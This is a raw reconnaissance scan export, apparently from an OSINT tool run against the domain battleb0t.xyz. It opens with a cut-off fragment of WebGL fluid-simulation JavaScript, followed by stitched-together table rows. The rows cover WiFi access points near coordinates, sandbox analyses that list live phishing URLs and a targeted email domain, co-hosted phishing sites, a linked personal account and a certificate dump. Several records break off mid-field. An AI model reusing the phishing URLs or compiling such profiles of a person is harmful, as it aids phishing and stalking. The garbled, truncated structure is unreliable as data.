gl.bindTexture(gl.TEXTURE_2D, texture);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_S, gl.CLAMP_TO_EDGE);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_T, gl.CLAMP_TO_EDGE);
gl.texImage2D(gl.TEXTURE_2D, 0, internalFormat, 4, 4, 0, format, type, null);
let fbo = gl.createFramebuffer();
gl.bindFramebuffer(gl.FRAMEBUFFER, fbo);
gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, texture, 0);
let status = gl.checkFramebufferStatus(gl.FRAMEBUFFER);
return status == gl.FRAMEBUFFER_COMPLETE;
}
function startGUI () {
var gui = new dat.GUI({ width: 300 });
gui.add(config, 'DYE_RESOLUTION', { 'high': 1024, 'medium': 512, 'low': 256, 'very low': 128 }).name('quality').onFinishChange(initFramebuffers);
gui.add(config, 'SIM_RESOLUTION', { '32': 32, '64': 64, '128': 128, '256': 256 }).name('sim resolution').onFinishChange(initFramebuffers);
gui.add(config, 'DENSITY_DISSIPATION', 0, 4.0).name('density diffusion');
gui.add(config, 'VELOCITY_DISSIPATION', 0, 4.0).name('velocity diffusion');
gui.add(config, 'PRESSURE', 0.0, 1.0).name('pressure');
gui.add(config, 'CURL', 0, 50).name('vorticity').step(1);
gui.add(config, 'SPLAT_RADIUS', 0.01, 1.0).name('splat radius');
gui.add(config, 'SHADING').name('shading').onFinishChange(updateKeywords);
gui.add(config, 'COLORFUL').name('colorful');
gui.add(config, 'PAUSED').name('paused').listen();
gui.add({ fun: () => {
splatStack.push(parseInt(Math.random() * 20) + 5);
} }, 'fun').name('Random splats');
let bloomFolder = gui.addFolder('Bloom');
bloomFolder.add(config, 'BLOOM').name('enabled').onFinishChange(updateKeywords);
bloomFolder.add(config, 'BLOOM_INTENSITY', 0.1, 2.0).name('intensity');
bloomFolder.add(config, 'BLOOM_THRESHOLD', 0.0, 1.0).name('threshold');
let sunraysFolder = gui.addFolder('Sunrays');
sunraysFolder.add(config, 'SUNRAYS').name('enabled').onFinishChange(updateKeywords);
sunraysFolder.add(config, 'SUNRAYS_WEIGHT', 0.3, 1.0).name('weight');
let captureFolder = gui.addFolder('Capture');
captureFolder.addColor(config, 'BACK_COLOR').name('background color');
captureFolder.add(config, 'TRANSPARENT').name('transparent');
captureFolder.add({ fun: captureScreenshot }, 'fun').name('take screenshot');
let github = gui.add({ fun : () => {
window.open('https://github.com/PavelDoGreat/WebGL-Fluid-Simulation');
ga('send', 'event', 'link button', 'github');
} }, 'fun').name('Github');
github.__li.className = 'cr function bigFont';
github.__li.style.borderLeft = '3px solid #8C8C8C';
let githubIcon = document.createElement('span');
github.domElement.parentElement.appendChild(githubIcon);
githubIcon.className = 'icon github';
let twitter = gui.add({ fun : () => {
ga('send', 'event', 'link button', 'twitter');
window.open('https://twitter.com/PavelDoGreat');
} }, 'fun').name('Twitter');
twitter.__li.className = 'cr function bigFont';
twitter.__li.style.borderLeft = '3px solid #8C8C8C';
let twitterIcon = document.createElement('span');
twitter.domElement.parentElement.appendChild(twitterIcon);
twitterIcon.className = 'icon twitter';
let discord = gui.add({ fun : () => {
ga('send', 'event', 'link button', 'discord');
window.open('https://discordapp.com/invite/CeqZDDE');
} }, 'fun').name('Discord');
discord.__li.className = 'cr function bigFont';
discord.__li.style.borderLeft = '3px solid #8C8C8C';
let discordIcon = document.createElement('span');
discord.domElement.parentElement.appendChild(discordIcon);
discordIcon.className = 'icon discord';
let app = gui.add({ fun : () => {
ga('send', 'event', 'link button', 'app');
window.open('http://onelink.to/5b58bn');
} }, 'fun').name('Check out mobile app');
app.__li.className = 'cr function appBigFont';
app.__li.style.borderLeft = '3px solid #00FF7F';
let appIcon = document.createElement('span');
app.domElement.parentElement.appendChild(appIcon);
appIcon.className = 'icon app';
if (isMobile())
gui.close();
}
function isMobile () {
return /Mobi|Android/i.test(navigator.userAgent);
}
function captureScreenshot () {
let res = getResolution(config.CAPTURE_RESOLUTION);
let target = createFBO(res.width, res.height, ext.formatRGBA.internalFor | https://fluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ThomasWirelessNetwork (Net ID: 00:0D:3A:2C:F8:2D) | 39.0469, -77.4903 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomD86B30 (Net ID: 00:0C:F6:D8:6B:30) | 50.8897, 6.0563 |
| 2023-05-12 02:56:07 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://cakrakembang-hotel.com/wp-admin/ms-footer/28390012/fguy3d273d723482345d/r1.php', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://wm50098748930309454ft456.netlify.app/index.htm#icoh%40inail.it%26data%3D05%7C01%7Cioc%40inail.it%7C98d23947704a4d7f239f08dac8a747e7%7C418322d35401446f99969e2e03ee3a5e%7C0%7C0%7C638042919755577393%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiL', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cakrakembang-hotel.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.htm HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index.htm HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /index_files/style_v2_optimized.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index_files/style_v2_optimized.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /index_files/open_sans.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index_files/open_sans.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /index_files/webmail-logo.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index_files/webmail-logo.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-Bold-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-Bold-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-ExtraBold-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-ExtraBold-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-BoldItalic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-BoldItalic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-ExtraBoldItalic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /cPanel_magic_revision_1386192031/unprotected/cpanel/fonts/open_sans/OpenSans-ExtraBoldItalic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /cPanel_magic_revision_1386192032/unprotected/cpanel/fonts/open_sans/OpenSans-Italic-webfont.eot? HTTP/1.1\nAccept: */*\nReferer: https://wm50098748930309454ft456.netlify.app/index.htm\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://wm50098748930309454ft456.netlify.app\nAccept-Encoding: gzip, deflate\nHost: wm50098748930309454ft456.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicat | 104.196.30.220 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0000cap.github.io | 185.199.111.153 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pronouns.Page (Category: social)
https://pronouns.page/api/profile/get/_BattleB0t_?version=2 | _BattleB0t_ |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Patreon | nwapi2.battleb0t.xyz |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0.github.io]
https://www.openphish.com/feed.txt | 0.github.io |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:57:f8:5f:6c:a4:d7:b1:d8:61:78:13:80:db:41:a4:54:3d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:23:04 2022 GMT
Not After : Feb 15 13:23:03 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d4:b5:dd:1d:03:00:c2:48:cc:5b:27:58:5a:1a:
ae:80:1c:0d:53:93:fb:69:7f:93:43:76:4d:e8:73:
1c:07:a2:3d:20:72:26:de:8b:cf:5e:08:ec:68:b1:
f5:77:47:34:1f:fc:12:0e:2f:4f:a4:d2:06:11:00:
78:b4:0d:40:fa:ba:21:05:d4:2d:c5:6d:14:14:39:
10:9a:e0:36:33:c9:8c:bb:e8:d5:33:a2:fb:d9:f7:
b5:1a:30:55:aa:67:e3:41:20:33:a1:e6:ed:c9:c3:
5b:50:61:0a:65:ba:c7:cc:f0:84:a3:6e:26:65:39:
57:a4:99:3b:03:5d:af:09:43:83:69:7f:84:65:08:
2e:12:10:15:1c:ad:1f:68:90:6a:0e:97:7d:ef:7a:
22:74:df:40:68:54:b2:c7:43:c9:cb:1c:9c:53:1d:
c4:68:a0:95:76:a1:bf:c8:18:fb:9d:30:f5:ff:26:
f8:35:1d:65:e6:a1:bc:6a:7f:70:ab:aa:3e:d6:87:
e6:17:39:3e:1e:ae:62:43:5c:02:c9:ab:c6:49:9a:
2c:43:3e:b0:0a:bb:6b:20:c9:45:43:a6:79:f2:70:
bf:69:eb:cb:fb:70:35:1a:f8:04:00:26:77:08:9e:
32:00:34:fd:0a:63:db:bc:61:0a:d9:52:e5:61:03:
a2:9b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:5A:2D:BE:67:DF:4E:45:A4:AD:A5:64:7A:31:7E:B3:39:8F:63:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 14:23:04.766 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D4:53:59:2F:EB:FF:FB:09:BA:76:BB:
E9:A4:81:C3:B1:93:13:10:22:54:A7:54:1C:46:19:3B:
6F:1B:01:CB:65:02:21:00:BB:AD:59:07:F2:64:D8:C4:
FA:7C:E2:49:2B:E4:9B:86:A7:0D:4A:BE:2B:43:0F:BA:
C2:73:EA:C3:69:47:E2:C3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 14:23:04.781 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:97:4D:DC:2F:D1:9B:1A:BE:09:EC:A2:
59:20:1E:95:7C:4B:C9:87:AC:96:9A:C3:4F:C0:0E:23:
4F:BC:16:AA:14:02:21:00:B1:07:3B:2C:0B:51:21:34:
74:50:BD:8C:B3:BE:A9:50:07:9B:F0:85:AB:3F:69:A1:
3D:6A:46:9D:88:A6:9A:89
Signature Algorithm: sha256WithRSAEncryption
ad:f7:33:43:81:f3:8d:21:44:85:e2:84:76:49:bc:87:f0:51:
96:b7:88:05:55:85:b8:e1:90:97:3e:c1:69:16:a8:c5:f1:39:
0d:d1:5f:8d:38:e4:0d:8b:e6:47:2a:f6:40:63:03:2b:f0:1f:
be:f8:b1:82:61:91:3b:03:b0:69:20:b4:dc:30:8c:89:f3:1c:
58:10:34:d9:81:b9:21:67:93:a8:46:92:4c:c7:e9:dc:76:7f:
5b:fc:b0:d2:dc:de:8d:94:c5:6b:c4:40:90:a8:e8:74:62:d2:
e6:1b:be:60:7f:96:01:c1:48:4a:c7:bd:8c:53:d2:a6:cf:88:
fa:4c:5d:6b:ed:42:b0:75:30:19:73:a0:d5:65:1d:45:1e:70:
23:da:e7:c5:31:6f:12:d3:54:2e:a3:91:e2:56:46:67:fd:10:
01:29:6e:69:67:d8:1f:99:c8:35:4f:2e:14:20:7c:c8:7b:86:
d6:ea:ed:96:56:81:0a:9f:3d:c7:d8:52:97:ea:0d:0a:ae:e6:
ce:93:f5:1e:0e:18:81:98:ef:d7:e3:a1:ab:63:09:30:4f:8f:
f5:0c:92:d0:84:ce:09:f8:71:10:dd:91:6b:72:67:70:ee:47:
d4:69:c2:95:9e:55:af:5a:cf:d9:19:cf:5f:f9:37:c3:6b:53:
ee:53:f7:4b
|
| 2023-05-12 02:44:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 127.97.148.34.bc.googleusercontent.com | 34.148.97.127 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Spotify (Category: music)
https://open.spotify.com/user/battleb0t | battleb0t |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Allstate 5G (Net ID: 00:02:6F:F8:0A:41) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:56:16 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://macinstruct.sertfidancilik.com/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2434.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "x1.c.lencr.org"\n "ocsp.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.7.33:443"\n "65.8.165.119:443"\n "104.196.30.220:443"\n "172.67.176.214:443"\n "65.8.165.51:80"\n "23.61.169.89:80"\n "65.8.165.104:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dc4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_dc4_IESQMMUTEX_0_519"\n "IsoScope_dc4_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_dc4_ConnHashTable<3524>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3524"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_dc4_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_dc4_IE_EarlyTabStart_0x530_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\MSIMGSIZECacheMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data Windows 2000/XP setup 4817 bytes 1 file at 0x2c +A "disallowedcert.stl" number 1 1 datablock 0x1 compression"\n "Cab2433.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "4L134F50.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4L134F50.txt]- [targetUID: 00000000-00003524]\n Dropped file: "XVLMDIKC.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XVLMDIKC.txt]- [targetUID: 00000000-00003524]\n Dropped file: "CVDBBF2V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CVDBBF2V.txt]- [targetUID: 00000000-00003524]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsmacinstruct.sertfidancilik.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003384]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003524]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003384]\n "logo_1_.png" has type "PNG image data 128 x 128 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n 